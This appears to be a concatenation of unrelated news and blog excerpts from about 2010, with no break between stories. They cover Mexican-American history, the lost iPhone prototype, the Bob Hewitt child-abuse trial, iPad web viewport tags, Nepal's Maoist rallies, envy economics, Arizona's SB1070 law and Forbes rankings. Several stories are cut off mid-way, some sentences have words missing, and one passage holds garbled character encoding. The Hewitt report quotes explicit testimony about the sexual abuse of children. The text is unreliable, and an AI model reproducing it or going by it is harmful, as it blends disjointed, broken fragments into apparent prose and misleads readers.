The treaty also guaranteed their safety and property rights , " as if the [ property ] belonged to citizens of the U.S. according to the principles of the Constitution . "
In practice , however , the new territories were far from the centers of U.S. government , and these guarantees were not reliably enforced .
By the end of the 19th century , many Mexican Americans had been deprived of their land , and found themselves living unprotected in an often hostile region .
We DIDN'T cross the border crossed US !
http://frontiers.loc.gov/...
One more important piece of land changed hands in 1854 , when the U.S. bought what is now southern Arizona and New Mexico from the Mexican government for $ 10 million .
This land deal , known as the Gadsden Purchase , brought the U.S. a much - coveted railroad route , and helped open the West to further expansion .
With two strokes of a pen , the larger nation had expanded its size by one - third .
And almost overnight , tens of thousands of Mexican citizens had become residents of the United States .
And never mind that many of the Mexicans of the northern part of Mexico , New Mexico and Texas were descendants of Sephardic Jews escaping the inquisition .
500 years of running
http://en.wikipedia.org/...
Where do we run to now ?
No , I will never forget .
I am angry that we have come around full cirlce to the same thing again .
Blaming the poor for the failings and greed of the weathy .
The person who found a prototype iPhone at a California bar did not notify the owners of the establishment or contact the Redwood City Police Department after obtaining the device , according to a new report .
While a previous report from Gizmodo said the person who found the device attempted to return it directly to Apple , the finder never contacted the owner of the Gourmet Haus Staudt bar , nor the local authorities , according to Jeff Bercovici of Daily Finance .
Both Volcker Staudt , owner of the bar , and Sgt. Dan Mulholland of the Redwood City Police Department said they were not informed of the device .
Staudt told Bercovici that the Apple engineer who allegedly left the prototype iPhone at his bar " called constantly trying to retrieve it . "
" The guy was pretty hectic about it , " Volcker reportedly told Daily Finance .
He questioned why the person who found the phone did n't bring it back to the bar , suggesting that was the simplest option to return the device to its rightful owner .
Bercovici also noted that Apple did not report the device as lost or stolen to the local police department .
Apple did not respond to a request for comment .
The editorial was later updated to express the opinion that Gawker Media , which paid $ 5,000 to obtain the device , " subsidized a crime . "
Paul J. Wallin , of the California law firm Wallin & Klaritch , said the burden was with Gawker Media , parent company of Gizmodo , to determine whether the device was legally obtained .
Gawker founder and owner Nick Denton responded by stating that his company was not sure the device was created by Apple until they opened it up and found the company 's name on some of its internal parts .
Earlier this week , Denton bragged via his Twitter account that his company is willing to pay for exclusives .
" We 'll do anything for a story , " he wrote .
" Our only obligation is to our readers . "
Australian - born tennis star , Bob Hewitt , is accused of raping two girls under the age of 16 in 1981 and 1982 , and sexually assaulting a third girl under the age of 18 in 1994 .
The 75 - year - old has pleaded not guilty to all three charges in the Johannesburg High Court .
Two of his accusers who have given permission to be named , have testified against Hewitt .
Hewitt won 15 Grand Slam doubles titles and is recognised as one of the greatest double players of all time .
He became a South African citizen after marrying a South African .
Suellen Sheehan ’s testimony
Suellen Sheehan stated in court on 10 February that Hewitt had sexually assaulted her when she was 12 after he picked her up for tennis practice .
Sheehan told the court how Hewitt had parked under trees when the two were early for practice and lowered the passenger seat of his car .
He allegedly told her to lower her underwear .
“ He put his penis inside me .
I remember exquisite pain , ” Sheehan claims .
Sheehan said that she never objected to Hewitt touching her : “ I did n’t object .
I was told this was something I was to do and I did it …
I did n’t put up any resistance .
I accepted it . ”
Theresa Tolken ’s testimony
Theresa
Tolken told the court on 9 February that Hewitt sexually abused her on a tennis training trip to South Africa ’s Sun City .
Tolken told the court that her tennis coach allegedly forced her to perform oral sex and touched her inappropriately when she was 12 .
This allegedly happened 34 years ago when Tolken lived in Bedforvidew , Johannesburg .
Tolken now lives in New Zealand and appeared in court to testify against Hewitt .
She told the South African court : “ I told my mother he made me take off my panties , told me to lie on top of him in the bath …
I told her he tried to put his penis in me . ”
Tolken explained that a case was opened the following day , but was not pursued as the case was not opened in the area where the attempted rape allegedly occurred , and there were concerns as to how Tolken would have been treated in court .
She testified that at the time Hewitt wrote three letters to her and instructed her to destroy them after reading .
Hewitt allegedly wrote of his “ love ” for Tolken , as reported by Times Live .
One extract read : “ I want to see you .
Ca n’t of course hold or kiss you because that has to come from you . ”
Another read : “ I can only think you think of me as a sex maniac , I am not . ”
The third read : “ I am so flat I ca n’t hold you , you are the only one who can lift me up . ” .
Tolken told the court that Hewitt ’s alleged abuse would be embedded in her head for the rest of her life .
“ I am here to see justice done ; Bob Hewitt has to pay for what he has done .
To say I am talking nonsense is ridiculous , ” she said .
In a statement read by Hewitt ’s lawyer Terry Price , the former tennis champion said of Tolken : “ I treated her like my own daughter and became , in retrospect , too close to her . ”
Hewitt further stated that his accusers have changed their statements a number of times .
His statement read : “ No matter what happens in this case I will never recover from these accusations . ”
The statement compared his case to the recent allegations against Bill Cosby .
Outside the courthouse , Women and Men Against Child Abuse held a black and red poster and called for a life sentence for child rapists .
Taking a stand with @hwalker1 and @ Terrym000 … # protectivebehaviours # bobhewitt pic.twitter.com/RoVQf7149l — geekinstilletos ( @geekinstilletos ) August 16 , 2013
Due to the allegations , Hewitt was suspended from the International Tennis Hall of Fame in November 2012 .
TOP IMAGE : “ Bob Hewitt ( 1967 ) ” by Eric Koch / Anefo – Nationaal Archief .
Licensed under CC BY - SA 3.0 nl via Wikimedia Commons
i Phone Apps on the iPad
Brian X. Chen at Wired , on the default iPhone apps that are n’t present on the iPad :
But if you recall , the iPhone ships with some apps that appear to be left out from the iPad : Stocks , Calculator , Clock , Weather and Voice Memos .
What gives ?
Apple did n’t respond to a request for comment , but I ’m willing to guess Apple will just stick those apps in the App Store for a free download , and they ’ll be the same apps as they were on the iPhone .
After all , it ’s unlikely there ’s much to do with those particular apps to make them visually special for the iPad .
Actually , it ’s sort of the opposite problem .
It ’s not that Apple could n’t just create bigger versions of these apps and have them run on the iPad .
It was n’t a technical problem , it was a design problem .
There were , internally to Apple ( of course ) , versions of these apps ( or at least some of them ) with upscaled iPad - sized graphics , but otherwise the same UI and layout as the iPhone versions .
Ends up that just blowing up iPhone apps to fill the iPad screen looks and feels weird , even if you use higher - resolution graphics so that nothing looks pixelated .
So they were scrapped by you - know - who .
Perhaps they ’ll appear on the iPad in some re-imagined form this summer with OS 4.0 , but when the iPad ships next month , there wo n’t be versions of these apps .
At least that ’s the story I ’ve heard from a few well - informed little birdies .
( There is , alas , no secret “ widget ” mode for iPad in OS 3.2 , either . )
Some ( maybe even most ? )
iPhone games will work well as - is , on the iPad .
Not just technically , but in terms of being fun and feeling right .
But non -game iPhone apps that are just upscaled on the iPad are going to feel weird .
And the run the app in a little iPhone - sized rectangle in the middle of an otherwise black screen mode is even weirder , I think .
A 3.5 - inch screen is just totally different than a 10 - inch screen .
On the whole , it ’s actually rather un - Apple - like that they ’re even allowing iPhone apps to run unmodified on the iPad .
It ’s a huge compatibility win , of course : an instant market of thousands and thousands of titles .
Given the runaway success of the App Store and the fundamental technical similarities between the iPhone and iPad , it ’s the sort of decision that most companies would n’t even think twice about .
But it ’s undeniably a sub-optimal user experience .
i Phone apps on the iPad are a “ good enough ” thing , not an “ exactly right ” thing .
Most companies — the ones that would n’t even see it as a tough decision whether to allow iPhone apps to run on the iPad — settle for “ good enough ” all the time .
Apple , on the other hand , usually goes for “ exactly right ” .
I ’ll go so far as to predict that by the time Monday April 5 rolls around , it ’ll already be an established meme that non-iPad - optimized iPhone apps are to the iPad what Classic apps were to Mac OS X — something you ’ll make do with “ for now ” but ca n’t wait to abandon for the real thing .
I ’m not saying it ’s a mistake that Apple is allowing the iPad to run iPhone apps .
I ’m just saying that the iPad is not a big iPhone .
( CNN ) -- A 6.3 - magnitude earthquake struck Papua New Guinea Sunday morning , the U.S. Geological Survey reported .
There were no immediate report of injuries , damages or deaths .
The quake struck at 9:15 a.m. Sunday ( 7:15 p.m. ET Saturday ) , according to USGS .
The quake 's epicenter was 30 kilometers ( 20 miles ) east of Lae , Papua New Guinea , and 300 km ( 185 miles ) north of the capital , Port Moresby , Papua New Guinea .
The quake had a depth of 66.2 kilometers ( 41.1 miles ) , USGS said .
In a somewhat stunning segment for America ’s “ best political team on television , ” CNN anchor Kyra Phillips had guests debate whether homosexuality needed a cure in a broadcast Tuesday .
“ Homosexuality : Is it a problem in need of a cure ? ” Kyra asks .
“ Grabs your attention , does n’t it ? ”
To be fair , the CNN anchor poses the question in the context of discussing a 1950s - era California law which requires health experts to seek a “ cure ” for gayness .
But the segment elevates discredited author Richard Cohen as a serious defender of the law despite the fact he was kicked out of the American Counseling Organization and practices without a license of any kind .
ADVERTISEMENT
Cohen was expelled from the American Counseling Association in 2002 for repeated violation of the organization ’s ethics code .
CNN also presents Cohen as a “ psychotherapist , ” which suggests he ’s a licensed psychologist or psychiatrist — though he is neither .
The liberal blog ThinkProgress writes :
Clearly , Ã¢â‚ ¬Å “ the best political team on televisionÃ¢â‚ ¬Â was just not at its best , proving that CNN canÃ¢â‚¬â „ ¢t be Ã¢â‚ ¬ Å“ trustedÃ¢â‚
¬
Â to do even the most preliminary background research on its guests .
The network provided the self - proclaimed former homosexual with a platform to promote his organization , the International Healing Foundation , without once challenging his credentials or claims of rehabilitation .
In reality , Cohen has been kicked out of the The American Counseling Association and currently operates without any professional license or accreditation .
His views on homosexuality have been discredited by every established medical organization and his ideas about gays are apparently only taken seriously by CNN bookers and producers .
Cohen also claims to be a “ reformed ” gay man , and is a member of Sun Myung Moon ’s “ Unification Church . ”
This video is from CNN ’s Newsroom , broadcast April 6 , 2010 .
ADVERTISEMENT
Watch this video on iPhone / iPad
[ The Unified Communist Party of Nepal ( Maoist ) has called for workers and villagers to converge on Kathmandu for a “ final conflict ” to win a new constitution .
The Maoists are calling for a sustained mobilisation , with the hope that an overwhelming showing can push the government out with a minimum of bloodshed and stay the hand of the Nepal army .
For more background , see " Nepal : Bracing for `high noon ' after May 1 " .
The UCPN ( M ) on April 27 called for an indefinite general strike starting May 2 , should the current prime minister not step aside in the face of the May 1 mass mobilisation . ]
* * *
Story and photos by Jed Brandt , Kathmandu
April 29 , 2010 -- Business as usual is over in Kathmandu .
With two days to go until May 1 , overflowing buses are pulling in by the hour to the outskirts of town .
The city is crowded .
Bus caravans are unloading directly into street marches wild with chanting , marshalled by uniformed cadre from the Young Communist League .
Despite a week of fear - mongering by Nepal ’s mainstream press , the crowds are militant , but unarmed .
And they are giddy despite harassment from the armed police on the roads leading into the city .
Several Maoists [ members of the Unified Communist Party of Nepal ( Maoist ) -- UPCN ( M ) ] have been arrested on petty weapons charges , but these are the exceptions to the rule .
The Maoist rallies have already started .
The central intersections of every district I passed were filled with young people , always the young !
There is more density towards the centre of the city , as mini-rallies are moving from the outskirts towards the centre , but they are n't all staying by government buildings .
It seems as the contingents arrive , they are dipping into the centre and then marching back out across the city .
The convergence of all these hundreds of thousands of people is set for May 1 .
The contingents are on their own for now .
Every " Armed Police " cop in the city must be on alert .
They are rallying too , but look noticeably unhappy .
Not aggressive so much as slouching in the back of their trucks , looking around nervously .
Among the residents of Kathmandu , the people going about their business while the city fills up , facial expressions are as good a guide to allegiance as anything people say .
Those who believe that people should make governments are excited , mobilised and on the march .
Those who fear the country people , the young and the workers are dour , hurrying to reach their personal destination .
Youth of a nation
I met Mukti , a Maoist party district leader from Kathmandu while he was overseeing rows of single - file columns , mostly students , filing out to their housing in the late afternoon .
Rain clouds were looming .
With a rare full beard and long hair , his tone was scholarly with a hint of rocker , and a Pearl Jam button his bag .
He was eager to talk :
We are staying at wedding halls .
Thirty thousand have come today from Chitwan .
Sixty tourist buses drive back and forth every day .
Too many people are waiting for transportation , but the drivers have been very helpful with their buses .
They are working very hard to help .
" The youth are going to make this day " , he said pointing to the three single - file lines of young men stretching parallel from the bus station a kilometre away .
None were children , but all were too young for marriage -- mostly older teenagers .
The Cellbots gang has been furiously productive as of late .
Not even a month after their wooden " boxbot " was first spotted on You Tube the project has moved on from its humble beginnings of lumber and windshield wiper motors to a full - on a neon green acrylic Truckbot that uses a G1 and Arduino board combination for control .
Sure , we 've seen Android - powered robots before , but these guys have done some pretty cool things , and have no intention of stopping now .
They 've already implemented an ultrasonic range detector so the ' bot can override the operator and prevent itself from running off a cliff ( although we 'd like to suggest mounting one on the rear as well -- for obvious reasons ) , voice recognition , and the Android compass into the control system .
If anything , the amount of progress makes this project very well worth keeping an eye on .
Move past the break to see some video , and then hit the source link to keep up with the action yourself .
An old Russian joke tells the story of a peasant with one cow who hates his neighbor because he has two .
A sorcerer offers to grant the envious farmer a single wish .
" Kill one of my neighbor 's cows ! " he demands .
Research by two British economists , Daniel Zizzo of Oxford University and Andrew Oswald of Warwick University , suggests there is a good bit of truth behind that joke .
In a recent study , Zizzo and Oswald ask , " Are People Willing to Pay to Reduce Others ' Incomes ? "
" The short answer to this question is : yes , " they report .
" Our subjects gave up large amounts of their cash to hurt others in the laboratory . "
Zizzo and Oswald set up an experiment in which groups of four subjects were initially given nearly equal amounts of money .
They then played a computerized gambling game .
During the game two of the players received an extra endowment of cash , a fact to which all of the players were alerted .
At the conclusion of the gambling sessions , each player was given the chance to spend his own money to anonymously " burn " some of the cash won by his fellow participants .
It was made clear that there was no prospect that burning his fellow player 's winnings would in any way make him richer .
In fact , if he chose to burn another player 's money , he had to pay between 2 cents and 25 cents for each dollar subtracted from the other player 's take .
Zizzo and Oswald found that nearly two - thirds of players happily paid for the privilege of impoverishing their fellow participants .
Even as the price of burning went up , the percentage of people who chose to burn other players did not fall substantially .
Why would people pay to hurt others without any benefit to themselves ?
Is it not the height of irrationality for a person to harm himself just so he can harm another more ?
Zizzo and Oswald believe the desire to burn other people 's cash " appears to be strong evidence for the existence of some kind of envy or concern for fairness . "
The poorest players chose to burn more of the winnings of the wealthiest , but big winners also burned other players , in their case indiscriminately .
The researchers speculate that winners may have chosen to burn others as a way of maintaining their rank :
They wanted to be first more than they wanted to maximize their cash holdings .
Apparently , it matters a great deal whether people believe that others deserve their good fortune .
If they do n't believe they do , then less well - off people will further impoverish themselves to bring the rich bastards down a peg or two .
Perhaps the opposition in the Senate to eliminating the death tax on estates over $ 625,000 can be traced to the sense that trust fund heirs are undeserving .
Oswald and Zizzo 's findings may be related to those of a study in which two Swiss economists , Ernst Fehr from the University of Zurich and Simon Gachter from the University of St. Gallen , determined that people will incur substantial costs to punish cheaters .
Such subjects engage in what the researchers call " altruistic punishment . "
Fehr and Gachter set up a public goods game with a common pot in which all the players could invest .
After all the players were given an opportunity to invest in the pot , the amount in the pot was increased and then split between all players at the end of each round .
The game was set up so that defectors could increase their total winnings by not investing at all , then taking a quarter of whatever was in the pot once the round was over .
In the games in which players had no opportunity to punish defectors , cooperation soon broke down completely and no one invested .
But once the ability to punish–say , by fining cheaters –was added , cooperation became widespread .
Even if punishers lost more than the cheaters they punished , they still deterred cheating .
It turns out that cooperation depends not just on reciprocity – " I 'll scratch your back and you scratch mine " – but also on retribution –
" If I scratch your back and you do n't reciprocate , I will punish you , no matter the cost to me . "
The fear of vengeance keeps would - be cheaters in line .
Perhaps players who received extra cash in the game devised by Oswald and Zizzo , analogous to the inheritors of great fortunes , are seen as somehow " cheating . "
This perception may incite the leveling instincts that apparently lurk within the human heart .
Socialists often claim that capitalism is based on humanity 's worst impulses , greed and selfishness , despite the fact that people who live in societies that participate in markets tend to be more generous and cooperative than those who do n't .
Oswald and Zizzo's research suggests that socialists who believe that their ideology appeals to humanity 's better instincts have it backwards .
Envy is behind the leveling spirit of socialism .
A truly generous and rational soul would wish others well , especially if they have done no one any harm .
Only an open society in which people clearly see that they have an opportunity to rise seems capable of containing and channeling humanity 's envy instinct .
The task for champions of freedom is to encourage people to want more cows for everybody .
The old saying goes that you never get a second chance to make a .
Why would that be ?
Surely , getting to know someone ought to give you more valuable information about who they are than just a brief encounter .
And clearly first impressions can be mistaken .
A favorite storyline in the featured wedding in the Sunday New York Times is that the couple did n't like each other when they first met even though their friends were all convinced that they were right for each other .
What is going on with these snap judgments ?
A lot of recent research has begun top play up the accuracy of judgments that get made quickly based on a sliver of information .
This work , popularized by Malcolm Gladwell 's book Blink suggests that there are many cases in which these snap judgments are accurate .
A paper by Daniel Ames , Lara Kammrath , Alexandra Suppes , and Niall Bolger in the February , 2010 issue of and Social Psychology Bulletin looked at people 's and accuracy when making judgments about personality characteristics of others .
In these studies , participants got to see photographs or short videos of real people .
The authors had also done personality assessments of these people to find out their values on the personality attributes ( , , , , and ) .
For each of the people that a participant judged , they saw a picture or video , and filled out a brief personality questionnaire for them .
Then , they judged how confident they were in their judgments .
The results suggest that people are moderately accurate at predicting a few personality dimensions based on small amounts of information .
For example , when seeing a brief video , participants showed some accuracy predicting a target person 's agreeableness , conscientiousness , and emotional stability , but not their extraversion or openness .
Although they were able to predict these dimensions to some degree , there was quite a bit of disagreement between people .
That is , the judgments were very variable .
In addition , a person 's confidence in their judgment about someone else had almost no relationship at all to their accuracy .
There was a slight tendency for people to be correct that they felt that they had no good basis for making a prediction , but when people were confident that they could make a good prediction , that did not signal that they actually could make a good prediction .
In addition , people who generally have high confidence in their intuitions were more confident in their judgments than those who like to think a lot about making judgments .
But this trust in did not lead to more accurate judgments .
So , what does this mean ?
When getting to know other people , we ought to treat our first impressions with caution .
It really does take a while to get to know people , and those first impressions are often flawed .
Worse yet , they can create a self - fulfilling prophecy .
Those initial impressions can affect how you treat people you have just met .
And your treatment of them will affect the way they react to you in return .
Finally , remember that your confidence in your beliefs about people you just met does n't really reflect how accurately you have gotten to know them .
The iPad has made choosing a good viewport tag for your site more challenging .
You now need to specify something that looks good with your content for screens that are 320 px , 480 px , 768 px , and 1024 px wide .
Viewports
Mobile Safari presents desktop - sized sites on small screens by rendering to a virtual browser screen that is 980 px ( ( Of course , when the iPad is in landscape orientation of 1024px wide , it will use 1024 px . ) ) wide , and letting you pan and zoom that page .
Viewport tags let you tell Mobile Safari that your site displays properly narrower than 980px , and set other preferences for scaling your page .
Craig Hockenberry famously determined the ideal viewport tag for content sites in the iPhone era .
That technique is no longer sufficient for the iPad because it can blow up your content larger than 1:1 , blurring your images .
TN2262
The Apple tech note “ Preparing Your Web Content for iPad ” has a good suggestion : avoid hard - coding a width for your viewport .
On the iPad , a viewport width smaller than 1024 can cause your content to be blown up and blurred .
Their suggestion is
< meta name = " viewport " content = " width=device - width " />
This is an improvement , but your content will still be blown up if your device is in landscape mode .
This is because device - width is the width of the physical device ( 320 px or 768 px ) , not the width of the screen in the current orientation .
As a consequence , you can get content rendered at 768 px and blown up to 1024 px .
Avoiding Blowup
To make sure your content is not blown up , set the maximum - scale to 1.0 :
< meta name = " viewport " content = " width=device - width , maximum - scale=1.0 " />
Sites with the above tag will get a 1:1 viewport for all devices and orientations .
This is impractical if your site does not render properly at 320 px wide .
In this case , hardcode a width and also set a maximum scale so your site is n’t blown up on the iPad :
< meta name = " viewport " content = " width=720 , maximum - scale=1.0 " />
This viewport will give you 1:1 rendering on the iPad , and a 720 px viewport on the iPhone and iPod touch .
Any desktop site that looks good narrower than 980 px should set a viewport like this , especially any site that fits in 768 px , since you can opt portrait - oriented iPad users into 1:1 unblurred versions of your content .
The initial - scale Hack
In Craig ’s aforelinked viewport post from 2007 , he suggested adding an initial - scale and minimum - scale of around 0.5 to your viewport for long pages .
Back then , this simply limited how zoomed out the page would be on initial load .
That ’s unnecessary now , since Mobile Safari instead sets the initial zoom to whatever is required to fit the width of the screen .
Setting a small initial - scale nowadays has an interesting effect : if your chosen initial - scale is less than would be required to fit the width of the screen , your viewport is expanded .
For example , if you set a viewport of 640 px wide , and an initial - scale of 0.5 , it will display normally on the iPhone ( scaled 0.5x to fit 640 px into 320 p x . )
On the iPad , however , it will expand your viewport to 1280 px , which was probably not your intention .
Overall , the initial - scale hack does n’t seem to have utility anymore , and has odd side effects , so I imagine sites that have adopted the initial - scale hack , such as Daring Fireball , will drop it as iPad usage increases .
On Friday , Arizona Governor Jan Brewer signed a blatant profiling bill into law , securing Arizona ’s title as the first official police state in the nation .
If enacted , a whopping 30 % of Arizonans – or nearly two million Latinos — would be walking around with a target on their backs .
Under the law , police must stop anyone who they have “ reasonable suspicion ” to believe may be an “ illegal immigrant . ”
President Obama slammed the new law as a severely “ misguided ” way to deal with immigration .
Republican lawmakers , on the other hand , are scrambling to excuse the fact that the bill mandates racial profiling and could waste hundreds of millions of taxpayer dollars .
According to Rep. Brian Bilbray ( R - CA ) , former lobbyist for the anti-immigrant group behind the bill , FAIR , police can use plenty of other cues — like people ’s hair , or shoes — to determine immigration status .
Watch the new mashup by my organization , America ’s Voice :
The irony here is that what was supposed to be a bill that mobilized the nativist elements of the GOP base has instead become a rallying cry for Latino and immigrant communities that have hosted intense , round - the - clock vigils and protests for the last six days in Arizona .
The Arizona Republic reported yesterday :
A line of activists and protesters filed in front of the state Capitol on Friday morning to rally against the immigration bill , joining those that had stayed the night . [...]
Students had left schools Thursday and protested at the Capitol .
Student protesters have been out front , protesting the Governor all the way to her hotel Thursday night to demand she veto the bill , while posting pictures on twitter with the hashtags # SB1070 and # altoarizona ( “ alto ” means stop in Spanish and AltoArizona.com is a hub of activity around the bill ) .
On Friday , the mainstream media finally began to cover this grassroots display of outrage and power – CNN ’s Rick Sanchez reported that protests of the bill were sending twitter over capacity and posted pictures from the thousands of protesters waiting outside to hear the Governor ’s decision .
As the final decision came down , pictures streaming across twitter showed the bill ’s opponents gathered peacefully on their knees , in a moment of silence for human dignity that was echoed across Spanish radio , facebook , and twitter .
Not your average tea party .
Student volunteers who had walked out of class in protest formed a human chain around counter - protesters , to make sure that the events stayed peaceful .
Watch it ( H/T RI4A ) :
Meanwhile , anti-immigrant extremism and bigotry was fully on display .
According to the Associated Press , Rep. Raúl Grijalva , who has been an outspoken critic of the bill and even called for an economic boycott of Arizona , had to close his district offices because of “ multiple threats . ”
AZ Star reports :
Grijalva staffer Ruben Reyes said the office has been flooded with calls all week about Senate Bill 1070 .
About 25 percent are " very racist " in nature , Reyes said , characterizing some as " telling that tortilla - eating wetback to go back to Mexico . "
Today , Rep. Grijalva and Rep. Luis Gutierrez are holding rallies in Phoenix and Tucson with thousands .
On Thursday night , 30,000 activists attended a conference call with Rep. Gutierrez organized by Reform Immigration FOR America .
From street action and artwork to organized rallies and events , these protests are n’t going to stop , even in the face of extremism .
Earlier this week , the Governor ’s office reported that opponents of the bill had flooded her office with more calls and faxes than supporters by a margin of about 6 – 1 .
Groups collecting signatures banded together to deliver over 50,000 petitions to the Governor ’s office in Phoenix .
All of this momentum is gearing up to go viral next weekend , on May 1st , when there will again be a show of strength and unity around the country at rallies in over 50 locations .
Organizers will be pressing for real immigration reform and an end to family separation , but I 'm guessing Arizona will take center stage .
BERLIN —
To get Berliners arguing , bring up the new $ 3.4 billion airport rising just beyond the limits of this hip but economically strapped metropolis .
Supporters of Berlin - Brandenburg International Airport contend that it might be the salvation of a city that , despite its incredible historical resonance , has become an economic and geographic backwater .
Detractors vehemently argue that the airport will be just another misguided drain of money by a local government critics say has failed to help Berlin realize its potential despite the city ’s status as one of the hottest destinations on the planet .
City planners designed the airport as a symbol of their dream for Berlin , restored to greatness as the capital of a unified Germany .
And so the fight now is about how Berlin has actually turned out : Germany ’s cultural magnet and international beacon but also its national poorhouse , struggling to break out of a long slump .
Berlin has the highest rate of residents on welfare — 18.6 percent — and received some $ 4 billion in state subsidies last year .
In a time of rising budget deficits , Germans are loath to bail out Greece in part because they have been bailing out their capital — and other stagnant parts of the former East Germany — for two decades .
Lakshmi Mittal , the London - based billionaire whose fortune was forged in the steel industry , is now the world 's third - richest man , according to the latest annual rankings published by Forbes Magazine .
Mr Mittal , who is becoming as well known for the conspicuous fashion in which he spends his money as he is for the way he makes it , joined the uppermost ranks of the elite through a series of deals last year .
He rose from No 62 on the annual Forbes ranking and is judged to be worth $ 25 bn ( £ 13bn ) .
He sits behind Microsoft founder Bill Gates , whose fortune stands at $ 46.5bn , and investment guru Warren Buffett , whose net worth is $ 44bn .
Mr Gates has topped the list since 1994 .
The world 's appetite for Billy bookcases and flat - pack beds has propelled another newcomer into the top 10 .
Ikea chief Ingvar Kamprad is ranked No 6 , with a $ 23 bn fortune .
There were 24 Britons on the list .
Retailer Philip Green and his wife Tina , who own high - street chains Bhs , Topshop and Dorothy Perkins and launched a failed bid to buy Marks & Spencer last year , are the highest ranked .
They are at No 68 , worth $ 6.3bn .
Other Britons include the Barclay twins , who built their fortune in real estate and last year bought the Daily and Sunday Telegraph .
They are at No 160 , worth $ 3.4bn .
Harry Potter author JK Rowling is worth $ 1bn , putting her at No 620 .
Adult entertainment boss Paul Raymond is 488th , worth $ 1.4bn .
Daily Mail press baron Jonathan Harmsworth , the fourth viscount Rothermere , is at 437 , worth $ 1.5 bn .
Virgin boss Sir Richard Branson is at 170 , with $ 3.2 bn .
Roman Abramovich , the Russian oil magnate and Chelsea football club owner , is ranked 21st with $ 13.3 bn .
Mr Mittal , 54 , who is an Indian citizen , is shy of the media .
He spent £ 57 m on a 12 - bedroom London home next to Kensington Palace and $ 60 m ( £ 31 m ) on his daughter 's wedding in Paris , which included a performance by Kylie Minogue .
Last year , he bought the US International Steel Group for $ 4.5 bn .
At the same time , he merged his US - quoted company Ispat International with his privately owned LNM Group .
New York has the highest number of billionaires , with 34 .
Moscow and San Francisco tie for second place with 20 apiece .
London and Los Angeles each have 18 billionaires .
The list shows that the rich continue to get richer .
The ranking identifies 691 billionaires worth $ 2.2 trillion , up $ 300bn from the combined worth of the 587 people listed last year .
" This list shows that things are on the move again , " said Steve Forbes , the magazine 's chief executive .
Other notables on the list include Martha Stewart , who left prison this month after being jailed for five months for lying to federal investigators .
The most famous businesswoman in the US appears to be more popular than ever , something reflected in her wealth .
She is listed equal 620 , with $ 1bn .
Wealth and worth
1 Bill Gates , Microsoft , $ 46.5 bn ( last year : 1 )
2 Warren Buffett , Berkshire Hathaway , $ 44bn ( 2 )
3 Lakshmi Mittal , Mittal Steel , $ 25 bn ( 62 )
4 Carlos Slim Helu , Grupo Carso , $ 23.8 bn ( 17 )
5 Prince Alwaleed , Saudi investor , $ 23.7bn ( 4 )
6 Ingvar Kamprad , Ikea , $ 23bn ( 13 )
7 Paul Allen , Microsoft co-founder , $ 21bn ( 5 )
8 Karl Albrecht , Aldi supermarket , $ 18.5 bn ( 3 )
9 Larry Ellison , Oracle , $ 18.4bn ( 12 )
10 Robert Walton , Wal - Mart , $ 18.3 bn ( 6 )
Top UK billionaires
68 Philip and Tina Green , Arcadia Group , $ 6.3 bn ( last year : 84 )
80 Gerald Cavendish Grosvenor , Duke of Westminster , $ 5.6bn ( 36 )
122 David Sainsbury , J Sainsbury , $ 4.3bn ( 116 )
151 Bernie Ecclestone , formula one , $ 3.6bn ( 136 )
160 David and Frederick Barclay , owners of the Daily Telegraph , $ 3.4bn ( 159 )
170 Richard Branson , Virgin group , $ 3.2bn ( 247 )
Source : Forbes
Please turn on JavaScript .
Media requires JavaScript to play .
A prototype spaceplane developed for the US military has been launched into orbit from Florida .
The X - 37B , which has been likened to a scaled - down space shuttle , blasted off from Cape Canaveral Air Force Station .
The unpiloted craft will carry out the first autonomous re-entry and landing in the history of the US space programme .
While we 've seen plenty of stabs at viable green energy , from underwater turbines to the Bloom Box , we 're always up for another .
Running along the same lines as Uppsala University 's algae - based batteries , researchers at Stanford are generating electrical current by tapping into the electron activity of individual algae cells .
The team designed a gold electrode that can be pushed through a cell membrane , which then seals around it .
The cell , still alive , does what it does best ( photosynthesis ) , at which point scientists harvest chemical energy in the form of electrons .
According to Stanford University News , this results in " electricity production that does n't release carbon into the atmosphere .
The only byproducts of photosynthesis are protons and oxygen . "
Of course , the team has a long way to go before this is economically feasible , but who knows ?
Maybe there 's an algae - powered OPhone in your future ...
Israel 's announcement last week that it was expanding settlements in East Jerusalem was calculated to undermine preliminary peace talks with the Palestinians , a top White House adviser said today .
Senior Adviser David Axelrod criticized the Israeli government for announcing the expansion while Vice President Joe Biden Joe BidenFive takeaways from Trump - Biden debate clash The Memo : Debate or debacle ?
Democrats rip
Trump for not condemning white supremacists , Proud Boys at debate MORE was visiting the country , undercutting the VP 's mission to set the stage for negotiations .
" We 've just gotten proximity , so - called proximity talks going between the Palestinians and the Israelis , and this seemed calculated to undermine that , " Axelrod told ABC's " This Week , " adding that the announcement was " distressing to everyone who is promoting the idea of peace and security in the region . "
ADVERTISEMENT
Axelrod repeated Secretary of State Hillary Clinton Hillary Diane Rodham ClintonHillary Clinton after debate : ' Everyone better vote ' Hillary Clinton : ' Black Lives Matter ' is 'very profoundly a theological statement '
House in near - unanimous vote affirms peaceful transfer of power MORE 's comment that the move was an " insult " to the U.S. , and said officials have made clear to Israel that " this was not the right way to behave . "
Biden was forced to issue a statement condemning the settlements while in Israel meeting with top officials .
The time has come for us to hear the first single from Bloc Party singer Kele 's solo album , The Boxer .
It 's called " Tenderoni " and , if you could n't tell by that title , it 's not just another Bloc Party track by another name .
Producer XXXChange of Spank Rock makes his electro - freak presence felt , and I suddenly feel the urge to go to the gym .
Listen right up there .
The Boxer is out June 21 in the UK via Wichita / Polydor and June 22 in the U.S. via Glassnote .
The " Tenderoni " single is out June 14 .
Note :
This is not a Chromeo cover .
Naked Teabagging Senator Scott Brown supports Harry Reid 's jobs bill , which is basically a tax credit and a couple bucks for infrastructure , somewhere .
Now the crazies are mad at him , and they 're taking it out on his Facebook wall .
These folks , Scott Brown 's " Fans , " thought Brown was literally the naked lovechild of Reagan and George Washington , but , in fact , he is a Senator from Massachusetts .
And he would like to remain a Senator from Massachuetts , which means sometimes he will have to vote for things that the people in his state ( not the people from Facebook ) support .
So Brown patiently explained , on the Facebook , that he 's voting for the bill because blah blah tax cuts bipartisanship etc. etc .
This message has 3,546 comments of pure rage .
( And 1,569 likes ! )
Here 's a good one :
I wish your truck had broken down and you could n't make it to Washington in time to vote for this bill !
You were OUR " hope and change " and you let US down BIG TIME !!!
Beck / Palin 2012 !!!
They 've also taken over his wall and uploaded some delightful " Fan Photos . "
The best part is that 75 % of these people seem to think Scott is reading this Facebook page .
And , oh shit , they 've taken over his daughter 's page too !
So now you basically know what it is like to be the legislative aide for any given congressman who fields calls from constituents .
And that is one of the many reasons why Congress is broken .
